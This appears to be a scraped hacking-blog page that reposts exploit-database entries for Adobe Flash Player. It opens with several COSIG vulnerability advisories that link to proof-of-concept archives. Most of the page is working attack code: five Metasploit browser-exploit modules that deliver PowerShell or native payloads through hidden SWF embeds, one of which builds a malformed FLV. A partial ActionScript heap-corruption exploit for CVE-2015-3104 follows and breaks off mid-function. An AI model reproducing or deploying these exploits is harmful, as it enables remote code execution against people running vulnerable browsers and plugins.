#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/avis/
# Twitter: @COSIG_
# Date: 12 juillet 2016
# CVE-2016-4176
# COSIG-2016-20
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-10: Francis Provencher du COSIG of COSIG report this vulnerability to Adobe PSIRT;
2016-05-17: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe publish a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, which contains ‘TAG’ invalid data.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-20.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40105.zip
###############################################################################
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863107299
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/avis/
# Twitter: @COSIG_
# Date: 12 juillet 2016
# CVE-2016-4177
# COSIG-2016-21
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-10: Francis Provencher du COSIG of COSIG report this vulnerability to Adobe PSIRT;
2016-05-17: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe publish a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, which contains ‘SceneAndFrameData’ invalid data.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-21.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40104.zip
###############################################################################
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE-2016-4175
# COSIG-2016-22
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices. Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-10: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe publish a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, which contains ‘DefineSprite’ invalid data.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-22-1.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40103.zip
####################################################################################
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE-2016-4179
# COSIG-2016-23
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
============================
2) Rapport de Coordination
============================
2016-05-14: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe publish a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, which contains “DefineBitsJPEG2” invalid data.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-23.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40102.zip
####################################################################################
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory',
'Description' => %q{
This module exploits an unintialized memory vulnerability in Adobe Flash Player. The
vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails
to initialize allocated memory. When using a correct memory layout this vulnerability
leads to a ByteArray object corruption, which can be abused to access and corrupt memory.
This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with
Flash 15.0.0.189.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nicolas Joly', # Vulnerability discovery
'Unknown', # Exploit in the wild
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2014-8440'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-24.html'],
['URL', 'http://malware.dontneedcoffee.com/2014/11/cve-2014-8440.html'],
['URL', 'http://www.verisigninc.com/en_US/cyber-security/security-intelligence/vulnerability-reports/articles/index.xhtml?id=1081']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => 'win',
'BrowserRequirements' =>
{
:source => /script|headers/i,
:os_name => OperatingSystems::Match::WINDOWS_7,
:ua_name => Msf::HttpClients::IE,
:flash => lambda { |ver| ver =~ /^15\./ && ver <= '15.0.0.189' },
:arch => ARCH_X86
},
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => 'Nov 11 2014',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
b64_payload = Rex::Text.encode_base64(psh_payload)
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-8440', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player ShaderJob Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability related to the ShaderJob workings on
Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the
same Bitmap object as src and destination of the ShaderJob. Modifying the "width" attribute
of the ShaderJob after starting the job it's possible to create a buffer overflow condition
where the size of the destination buffer and the length of the copy are controlled. This
module has been tested successfully on:
* Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169.
* Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169.
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169.
* Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris Evans', # Vulnerability discovery
'Unknown', # Exploit in the wild
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2015-3090'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-09.html'],
['URL', 'https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html'],
['URL', 'http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html'],
['URL', 'http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win', 'linux'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX ||
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
when 'Linux'
return true if ua == Msf::HttpClients::FF
end
false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
return true if ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.169')
when 'Linux'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.457')
end
false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'May 12 2015',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]
if target.name =~ /Windows/
platform_id = 'win'
elsif target.name =~ /Linux/
platform_id = 'linux'
end
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3090', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
CLASSID = 'd27cdb6e-ae6d-11cf-96b8-444553540000'
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => "Adobe Flash Player PCRE Regex Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in Adobe Flash Player. A compilation logic error
in the PCRE engine, specifically in the handling of the \c escape sequence when followed by
a multi-byte UTF8 character, allows arbitrary execution of PCRE bytecode.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mark Brand', # Found vuln
'sinn3r' # MSF
],
'References' =>
[
[ 'CVE', '2015-0318' ],
[ 'URL', 'http://googleprojectzero.blogspot.com/2015/02/exploitingscve-2015-0318sinsflash.html' ],
[ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=199' ]
],
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true
},
'DefaultOptions' =>
{
'Retries' => true
},
'Platform' => 'win',
'BrowserRequirements' =>
{
:source => /script|headers/i,
:clsid => "{#{CLASSID}}",
:method => "LoadMovie",
:os_name => OperatingSystems::Match::WINDOWS_7,
:ua_name => Msf::HttpClients::IE,
# Ohter versions are vulnerable but .235 is the one that works for me pretty well
# So we're gonna limit to this one for now. More validation needed in the future.
:flash => lambda { |ver| ver == '16.0.0.235' }
},
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Nov 25 2014",
'DefaultTarget' => 0))
end
def exploit
# Please see data/exploits/CVE-2015-0318/ for source,
# that's where the actual exploit is
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status("Sending SWF...")
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
return
end
print_status("Sending HTML...")
tag = retrieve_tag(cli, request)
profile = get_profile(tag)
profile[:tried] = false unless profile.nil? # to allow request the swf
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
b64_payload = Rex::Text.encode_base64(psh_payload)
html_template = %Q|<html>
<body>
<object classid="clsid:#{CLASSID}" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2015-0318", "Main.swf" )
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player NetConnection Type Confusion',
'Description' => %q{
This module exploits a type confusion vulnerability in the NetConnection class on
Adobe Flash Player. When using a correct memory layout this vulnerability allows
to corrupt arbitrary memory. It can be used to overwrite dangerous objects, like
vectors, and finally accomplish remote code execution. This module has been tested
successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 16.0.0.305.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Natalie Silvanovich', # Vulnerability discovery and Google Project Zero Exploit
'Unknown', # Exploit in the wild
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2015-0336'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-05.html'],
['URL', 'http://googleprojectzero.blogspot.com/2015/04/a-tale-of-two-exploits.html'],
['URL', 'http://malware.dontneedcoffee.com/2015/03/cve-2015-0336-flash-up-to-1600305-and.html'],
['URL', 'https://www.fireeye.com/blog/threat-research/2015/03/cve-2015-0336_nuclea.html'],
['URL', 'https://blog.malwarebytes.org/exploits-2/2015/03/nuclear-ek-leverages-recently-patched-flash-vulnerability/']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => 'win',
'BrowserRequirements' =>
{
:source => /script|headers/i,
:os_name => OperatingSystems::Match::WINDOWS_7,
:ua_name => Msf::HttpClients::IE,
:flash => lambda { |ver| ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.305') },
:arch => ARCH_X86
},
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => 'Mar 12 2015',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
@trigger = create_trigger
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
b64_payload = Rex::Text.encode_base64(psh_payload)
trigger_hex_stream = @trigger.unpack('H*')[0]
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&tr=<%=trigger_hex_stream%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&tr=<%=trigger_hex_stream%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
def create_trigger
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'trigger.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser
encoded audio inside a FLV video, as exploited in the wild on June 2015. This module
has been tested successfully on:
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,
Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and
Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.
Note that this exploit is effective against both CVE-2015-3113 and the
earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression
to the same root cause as CVE-2015-3043.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Exploit in the wild
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2015-3043'],
['CVE', '2015-3113'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],
['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],
['URL', 'http://bobao.360.cn/learning/detail/357.html']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win', 'linux'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX ||
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
when 'Linux'
return true if ua == Msf::HttpClients::FF
end
false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161')
return true if ver =~ /^17\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169')
when 'Linux'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457')
end
false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jun 23 2015',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
@flv = create_flv
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
if request.uri =~ /\.flv$/
print_status('Sending FLV...')
send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]
if target.name =~ /Windows/
platform_id = 'win'
elsif target.name =~ /Linux/
platform_id = 'linux'
end
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
def create_flv
header = ''
header << 'FLV' # signature
header << [1].pack('C') # version
header << [4].pack('C') # Flags: TypeFlagsAudio
header << [9].pack('N') # DataOffset
data = ''
data << "\x68" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0
data << "\xee" * 0x440 # SoundData
tag1 = ''
tag1 << [8].pack('C') # TagType (audio)
tag1 << "\x00\x04\x41" # DataSize
tag1 << "\x00\x00\x1a" # TimeStamp
tag1 << [0].pack('C') # TimeStampExtended
tag1 << "\x00\x00\x00" # StreamID, always 0
tag1 << data
body = ''
body << [0].pack('N') # PreviousTagSize
body << tag1
body << [0xeeeeeeee].pack('N') # PreviousTagSize
flv = ''
flv << header
flv << body
flv
end
end
// Exploit Title: Adobe Flash Player - Integer Overflow
// Exploit Author: Matteo Memelli (ryujin@offensive-security)
// Date: 14/01/2017
// Original PoC: https://bugs.chromium.org/p/project-zero/issues/detail?id=323&can=1&q=Shader
// CVE: CVE-2015-3104
// Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3104
package
{
import flash.display.*;
import flash.utils.ByteArray;
import flash.events.Event;
import flash.events.MouseEvent;
import flash.text.*
import mx.utils.Base64Decoder;
public class ShaderInputOverflow extends Sprite
{
public var bb:ByteArray = null;
public var allocate:Array;
public var MAX_ARRAY:uint = 81920;
public var text:TextField = new TextField();
public var gText:String = "";
public var corrupted:uint = 0;
public var corrupted_ba_address:uint = 0;
public var corrupted_ba_pos:uint = 0;
public var next_ba_address:uint = 0;
public var NPSWF32Base:uint = 0;
public function ShaderInputOverflow():void
{
if (stage) drawText();
else addEventListener(Event.ADDED_TO_STAGE, drawText);
drawText();
var i:uint;
allocate = new Array();
for (i = 0; i < MAX_ARRAY; i++) {
bb = new ByteArray();
bb.writeByte(0x57);
bb.writeByte(0x30);
bb.writeByte(0x30);
bb.writeByte(0x54);
bb.writeByte(0x57);
bb.writeByte(0x30);
bb.writeByte(0x30);
bb.writeByte(0x54);
bb.writeByte(0x57);
bb.writeByte(0x30);
bb.writeByte(0x30);
bb.writeByte(0x54);
bb.writeByte(0x57);
bb.writeByte(0x30);
bb.writeByte(0x30);
bb.writeByte(0x54);
allocate.push(bb);
}
// We create "holes" of size 0x18 bytes on the heap
i = MAX_ARRAY/2;
while (i<MAX_ARRAY)
{
if (i % 2 != 0) {
allocate[i] = null;
}
i++;
}
var ba:ByteArray = new ByteArray();
ba.writeByte(0xa1); // Define parameter?
ba.writeByte(0x02); // Output.
ba.writeByte(0x04); // Type: 4 floats.
ba.writeByte(0x00); // 16-bit field, ??
ba.writeByte(0x01);
ba.writeByte(0xff); // Mask.
ba.writeByte(0x41);
ba.writeByte(0x00); // Param name: 'A'
ba.writeByte(0xa3); // Add texture?
ba.writeByte(0x00); // Index?
ba.writeByte(0x40); // 64 channels.
ba.writeByte(0x42);
ba.writeByte(0x42);
ba.writeByte(0x42);
ba.writeByte(0x42);
ba.writeByte(0x00); // Texture name: 'BBBB'
ba.position = 0;
var baOut:ByteArray = new ByteArray();
var baIn:ByteArray = new ByteArray();
// Overwrite ByteArray::Buffer Object capacity field with 0xffffffff
// and the pointer to the data to 0x16000000
baIn.writeUnsignedInt(0x6230306e);
baIn.writeUnsignedInt(0x6230306e);
baIn.writeUnsignedInt(0x41414141); // ptr
baIn.writeUnsignedInt(0x41414141); // 0x1
// Offset can be 0x10 bytes
baIn.writeUnsignedInt(0x16000000); // ptr to data
baIn.writeUnsignedInt(0xffffffff); // capacity
baIn.writeUnsignedInt(0x16000000); // length / ptr to data
// Another time in case the offset is 0x8 bytes
baIn.writeUnsignedInt(0xffffffff); // capacity
baIn.writeUnsignedInt(0xffffffff); // length
var job:ShaderJob = new ShaderJob();
var shader:Shader = new Shader();
shader.byteCode = ba;
shader.data.BBBB.width = 8192;
shader.data.BBBB.height = 8192;
shader.data.BBBB.input = baIn;
job.target = baOut;
job.width = 1;
job.height = 1;
job.shader = shader;
// We need to catch the Error thrown by Flash to continue the execution
// job.start triggers the copy that causes the heap overflow
try
{
job.start(true);
}
catch (err:Error)
{
trace("w00t");
}
var s:spray = new spray();
corrupted = findCorrupted();
allocate[corrupted].position = 0;
gText += "The corrupted ByteArray object is at index " + corrupted.toString() + " of the 'allocate' array\n";
gText += "The length of the corrupted ByteArray is " + (allocate[corrupted].length).toString(16) + "\n";
findCorruptedAddress();
gText += "Corrupted ByteArray::Buffer object address 0x" + (corrupted_ba_address).toString(16) + "\n";
var NPSWF32Ptr:uint = readDword((corrupted_ba_address+0x18*2));
gText += "NPSWF32Ptr: 0x" + NPSWF32Ptr.toString(16) + "\n";
NPSWF32Base = findNPSWF32_Base(NPSWF32Ptr);
